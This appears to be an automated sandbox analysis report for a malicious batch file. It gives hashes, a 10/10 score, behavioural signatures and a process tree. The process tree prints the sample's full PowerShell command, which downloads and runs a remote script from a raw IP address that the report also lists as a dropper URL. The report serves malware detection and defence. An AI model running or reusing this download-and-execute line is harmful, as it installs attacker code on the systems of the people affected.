Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10_x64 -
resource
win10 -
submitted
04-08-2020 12:19
Static task
static1
Behavioral task
behavioral1
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
2b4587aed40db6e44cbff092b52b841e.bat
-
Size
218B
-
MD5
c69dabb8c2f1ca155fb5fe3b0482d0a7
-
SHA1
b3faaf0bd82fe27b076ec814b2123cf962ead51b
-
SHA256
99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
-
SHA512
c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3908 wrote to memory of 3860 3908 cmd.exe powershell.exe PID 3908 wrote to memory of 3860 3908 cmd.exe powershell.exe PID 3908 wrote to memory of 3860 3908 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3592 3860 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3592 WerFault.exe Token: SeBackupPrivilege 3592 WerFault.exe Token: SeDebugPrivilege 3592 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
WerFault.exepid process 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe 3592 WerFault.exe -
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/3860-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3860-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3860-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3860-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3860-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3860-7-0x0000000000000000-mapping.dmp servicehost
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"2⤵PID:3860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3592